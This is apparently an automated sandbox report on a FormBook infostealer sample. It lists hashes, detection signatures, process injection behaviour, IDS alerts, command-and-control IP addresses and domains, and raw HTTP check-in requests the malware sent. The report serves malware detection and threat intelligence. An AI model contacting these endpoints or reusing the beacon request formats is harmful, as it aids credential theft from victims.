Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NFhRxwbegd.exe

Overview

General Information

Sample name:NFhRxwbegd.exe
renamed because original name is a hash value
Original sample name:d26c248791d7c1347e8e21257ad5522c1e47e26e054a59bc61a50133e5d180d6.exe
Analysis ID:1588097
MD5:7b4d6f3b6a3b509738048774b20fad27
SHA1:4e96c226734aa7a5df5910efb87542bfb671674f
SHA256:d26c248791d7c1347e8e21257ad5522c1e47e26e054a59bc61a50133e5d180d6
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • NFhRxwbegd.exe (PID: 2488 cmdline: "C:\Users\user\Desktop\NFhRxwbegd.exe" MD5: 7B4D6F3B6A3B509738048774B20FAD27)
    • NFhRxwbegd.exe (PID: 6684 cmdline: "C:\Users\user\Desktop\NFhRxwbegd.exe" MD5: 7B4D6F3B6A3B509738048774B20FAD27)
      • gsolWhsjddFW.exe (PID: 2948 cmdline: "C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • ieUnatt.exe (PID: 5608 cmdline: "C:\Windows\SysWOW64\ieUnatt.exe" MD5: 4E9919DF2EF531B389ABAEFD35AD546E)
          • gsolWhsjddFW.exe (PID: 2496 cmdline: "C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5024 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.4085031615.0000000004EC0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.2561213396.0000000001830000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000009.00000002.4087823404.00000000052A0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.NFhRxwbegd.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              5.2.NFhRxwbegd.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T21:31:07.184740+010020507451Malware Command and Control Activity Detected192.168.2.664216154.12.28.18480TCP
                2025-01-10T21:31:31.402837+010020507451Malware Command and Control Activity Detected192.168.2.66422118.139.62.22680TCP
                2025-01-10T21:31:45.060492+010020507451Malware Command and Control Activity Detected192.168.2.664227104.21.16.180TCP
                2025-01-10T21:32:06.670746+010020507451Malware Command and Control Activity Detected192.168.2.664231209.74.77.10780TCP
                2025-01-10T21:32:19.896502+010020507451Malware Command and Control Activity Detected192.168.2.66423684.32.84.3280TCP
                2025-01-10T21:32:34.634334+010020507451Malware Command and Control Activity Detected192.168.2.664240154.208.202.22580TCP
                2025-01-10T21:32:48.369228+010020507451Malware Command and Control Activity Detected192.168.2.66424477.68.64.4580TCP
                2025-01-10T21:33:02.365444+010020507451Malware Command and Control Activity Detected192.168.2.664248208.91.197.2780TCP
                2025-01-10T21:33:15.668369+010020507451Malware Command and Control Activity Detected192.168.2.66425284.32.84.3280TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T21:31:07.184740+010028554651A Network Trojan was detected192.168.2.664216154.12.28.18480TCP
                2025-01-10T21:31:31.402837+010028554651A Network Trojan was detected192.168.2.66422118.139.62.22680TCP
                2025-01-10T21:31:45.060492+010028554651A Network Trojan was detected192.168.2.664227104.21.16.180TCP
                2025-01-10T21:32:06.670746+010028554651A Network Trojan was detected192.168.2.664231209.74.77.10780TCP
                2025-01-10T21:32:19.896502+010028554651A Network Trojan was detected192.168.2.66423684.32.84.3280TCP
                2025-01-10T21:32:34.634334+010028554651A Network Trojan was detected192.168.2.664240154.208.202.22580TCP
                2025-01-10T21:32:48.369228+010028554651A Network Trojan was detected192.168.2.66424477.68.64.4580TCP
                2025-01-10T21:33:02.365444+010028554651A Network Trojan was detected192.168.2.664248208.91.197.2780TCP
                2025-01-10T21:33:15.668369+010028554651A Network Trojan was detected192.168.2.66425284.32.84.3280TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T21:31:23.748355+010028554641A Network Trojan was detected192.168.2.66421818.139.62.22680TCP
                2025-01-10T21:31:26.287701+010028554641A Network Trojan was detected192.168.2.66421918.139.62.22680TCP
                2025-01-10T21:31:28.841664+010028554641A Network Trojan was detected192.168.2.66422018.139.62.22680TCP
                2025-01-10T21:31:37.436320+010028554641A Network Trojan was detected192.168.2.664223104.21.16.180TCP
                2025-01-10T21:31:39.963653+010028554641A Network Trojan was detected192.168.2.664224104.21.16.180TCP
                2025-01-10T21:31:42.524530+010028554641A Network Trojan was detected192.168.2.664226104.21.16.180TCP
                2025-01-10T21:31:58.975927+010028554641A Network Trojan was detected192.168.2.664228209.74.77.10780TCP
                2025-01-10T21:32:01.521771+010028554641A Network Trojan was detected192.168.2.664229209.74.77.10780TCP
                2025-01-10T21:32:04.084071+010028554641A Network Trojan was detected192.168.2.664230209.74.77.10780TCP
                2025-01-10T21:32:12.207852+010028554641A Network Trojan was detected192.168.2.66423284.32.84.3280TCP
                2025-01-10T21:32:14.762335+010028554641A Network Trojan was detected192.168.2.66423384.32.84.3280TCP
                2025-01-10T21:32:17.318241+010028554641A Network Trojan was detected192.168.2.66423484.32.84.3280TCP
                2025-01-10T21:32:26.518281+010028554641A Network Trojan was detected192.168.2.664237154.208.202.22580TCP
                2025-01-10T21:32:29.087865+010028554641A Network Trojan was detected192.168.2.664238154.208.202.22580TCP
                2025-01-10T21:32:31.638362+010028554641A Network Trojan was detected192.168.2.664239154.208.202.22580TCP
                2025-01-10T21:32:40.316256+010028554641A Network Trojan was detected192.168.2.66424177.68.64.4580TCP
                2025-01-10T21:32:42.836491+010028554641A Network Trojan was detected192.168.2.66424277.68.64.4580TCP
                2025-01-10T21:32:45.772965+010028554641A Network Trojan was detected192.168.2.66424377.68.64.4580TCP
                2025-01-10T21:32:54.169583+010028554641A Network Trojan was detected192.168.2.664245208.91.197.2780TCP
                2025-01-10T21:32:56.697608+010028554641A Network Trojan was detected192.168.2.664246208.91.197.2780TCP
                2025-01-10T21:32:59.272960+010028554641A Network Trojan was detected192.168.2.664247208.91.197.2780TCP
                2025-01-10T21:33:08.000458+010028554641A Network Trojan was detected192.168.2.66424984.32.84.3280TCP
                2025-01-10T21:33:10.557059+010028554641A Network Trojan was detected192.168.2.66425084.32.84.3280TCP
                2025-01-10T21:33:13.126131+010028554641A Network Trojan was detected192.168.2.66425184.32.84.3280TCP
                2025-01-10T21:33:21.361806+010028554641A Network Trojan was detected192.168.2.664253104.21.80.180TCP
                2025-01-10T21:33:23.895129+010028554641A Network Trojan was detected192.168.2.664254104.21.80.180TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: NFhRxwbegd.exeAvira: detected
                Antivirus detection for URL or domain
                Source: https://www.muasamgiare.click/bsye/?bJMLqbS=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvNAvira URL Cloud: Label: malware
                Source: http://www.muasamgiare.click/bsye/?bJMLqbS=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2Ifk8NCmqj7EA+sq0ZeNMbUcOm/Pw4wT4fiopZxiw3DzN75FCJC90=&xHrti=IpSlbxE0jRAvira URL Cloud: Label: malware
                Source: http://www.happyjam.life/4t49/?bJMLqbS=qSUUy2RUpcHfgeDYScePJkyQ5UV89Z0x3ukWI3F+j71sN74kYD8q/afbxdu8+w0uynd4aRJgg192nr/hQaDBpn5+oFhPZEmVooqYAS7CTo53tl0ZDt39OsMeY4bL/YnlFHih9hs=&xHrti=IpSlbxE0jRAvira URL Cloud: Label: malware
                Source: http://www.123hellodrive.shop/vc3u/?bJMLqbS=BIzO2x/CParM8yIJPtdG01YaZAIKO+ejS6SUxHNGTKrV1frM7wJkom86Bn77y9QMlkCGGhfkfqeUHrw85/0eDGlvXn9DOOwTAZn4x9nN1KHp17H/VFEoZ1G6gs1B1eVaLYSkVN0=&xHrti=IpSlbxE0jRAvira URL Cloud: Label: malware
                Source: http://www.muasamgiare.click/bsye/Avira URL Cloud: Label: malware
                Source: http://www.appsolucao.shop/qt4m/Avira URL Cloud: Label: malware
                Source: http://www.appsolucao.shop/qt4m/?bJMLqbS=/ZQwF7Ip71YCaUlU/jTQ7l2Lp/ZTQN44rx1LzCy9bB7kVb+FnyrErN7h2wh6V0uCxKMxAv7qgoDPyMkbBqZLKSqD3jYvFd9V+3GHQAeGdc6B9Gg3Jsv2Vj+r5nwJfwG+iPE84zU=&xHrti=IpSlbxE0jRAvira URL Cloud: Label: malware
                Source: http://www.123hellodrive.shop/vc3u/Avira URL Cloud: Label: malware
                Source: http://www.happyjam.life/4t49/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: NFhRxwbegd.exeVirustotal: Detection: 76%Perma Link
                Source: NFhRxwbegd.exeReversingLabs: Detection: 78%
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.NFhRxwbegd.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.NFhRxwbegd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.4085031615.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2561213396.0000000001830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4087823404.00000000052A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2562570319.00000000026F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4085165315.0000000004F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: NFhRxwbegd.exeJoe Sandbox ML: detected
                Source: NFhRxwbegd.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: NFhRxwbegd.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: ieUnAtt.pdbGCTL source: NFhRxwbegd.exe, 00000005.00000002.2560705901.0000000001467000.00000004.00000020.00020000.00000000.sdmp, NFhRxwbegd.exe, 00000005.00000002.2560705901.0000000001448000.00000004.00000020.00020000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000003.2762247141.0000000000F61000.00000004.00000020.00020000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000003.2488431094.0000000000F42000.00000004.00000020.00020000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000003.2488431094.0000000000F61000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gsolWhsjddFW.exe, 00000007.00000002.4082242168.000000000049E000.00000002.00000001.01000000.0000000C.sdmp, gsolWhsjddFW.exe, 00000009.00000000.2628798758.000000000049E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: ieUnAtt.pdb source: NFhRxwbegd.exe, 00000005.00000002.2560705901.0000000001467000.00000004.00000020.00020000.00000000.sdmp, NFhRxwbegd.exe, 00000005.00000002.2560705901.0000000001448000.00000004.00000020.00020000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000003.2762247141.0000000000F61000.00000004.00000020.00020000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000003.2488431094.0000000000F42000.00000004.00000020.00020000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000003.2488431094.0000000000F61000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: NFhRxwbegd.exe, 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2562941054.0000000004E92000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2560752916.0000000004CED000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: NFhRxwbegd.exe, NFhRxwbegd.exe, 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, ieUnatt.exe, 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2562941054.0000000004E92000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2560752916.0000000004CED000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F7CC50 FindFirstFileW,FindNextFileW,FindClose,8_2_02F7CC50
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 4x nop then xor eax, eax8_2_02F69F60
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 4x nop then mov ebx, 00000004h8_2_053904E8

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64224 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64218 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64237 -> 154.208.202.225:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64238 -> 154.208.202.225:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:64231 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:64231 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:64240 -> 154.208.202.225:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:64240 -> 154.208.202.225:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64223 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64228 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64253 -> 104.21.80.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64230 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:64227 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:64227 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64226 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64219 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:64221 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:64221 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:64236 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:64236 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:64252 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:64252 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:64248 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:64248 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:64216 -> 154.12.28.184:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:64216 -> 154.12.28.184:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64233 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64251 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64234 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64232 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64239 -> 154.208.202.225:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64250 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64229 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64241 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:64244 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:64244 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64220 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64254 -> 104.21.80.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64249 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64242 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64246 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64245 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64243 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:64247 -> 208.91.197.27:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.aziziyeescortg.xyz
                Source: global trafficTCP traffic: 192.168.2.6:64211 -> 162.159.36.2:53
                Source: Joe Sandbox ViewIP Address: 77.68.64.45 77.68.64.45
                Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                Source: Joe Sandbox ViewIP Address: 209.74.77.107 209.74.77.107
                Source: Joe Sandbox ViewASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /vt4e/?bJMLqbS=VWo59DE7z/zpNvlQrGwQqnlKKikmhHzFU/awM9upW87Yx15oShf3plLjnAS2lxJKaRtg2RYIywQ4d8OifO+Rpmij5Ffq0kXSJKVYpR6npO/nbInFwrm8n/2iwd1ApVHfxnTP7ZY=&xHrti=IpSlbxE0jR HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.7261ltajbc.bondConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /bsye/?bJMLqbS=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2Ifk8NCmqj7EA+sq0ZeNMbUcOm/Pw4wT4fiopZxiw3DzN75FCJC90=&xHrti=IpSlbxE0jR HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.muasamgiare.clickConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /86am/?bJMLqbS=3oSH5g+vR97eOiEYl3yzUVrLMoE7cdRqP5dq8IAVURGuW00cQLCZ5FvWMVk05HdygRwRYgTMj/cz+G8Xe6bu8d3TmiM5UZa33tCVJhgbgr0dm7+Mwsdmgoa6VRIc03dgAyFEL2o=&xHrti=IpSlbxE0jR HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.kkpmoneysocial.topConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /4t49/?bJMLqbS=qSUUy2RUpcHfgeDYScePJkyQ5UV89Z0x3ukWI3F+j71sN74kYD8q/afbxdu8+w0uynd4aRJgg192nr/hQaDBpn5+oFhPZEmVooqYAS7CTo53tl0ZDt39OsMeY4bL/YnlFHih9hs=&xHrti=IpSlbxE0jR HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.happyjam.lifeConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /vc3u/?bJMLqbS=BIzO2x/CParM8yIJPtdG01YaZAIKO+ejS6SUxHNGTKrV1frM7wJkom86Bn77y9QMlkCGGhfkfqeUHrw85/0eDGlvXn9DOOwTAZn4x9nN1KHp17H/VFEoZ1G6gs1B1eVaLYSkVN0=&xHrti=IpSlbxE0jR HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.123hellodrive.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
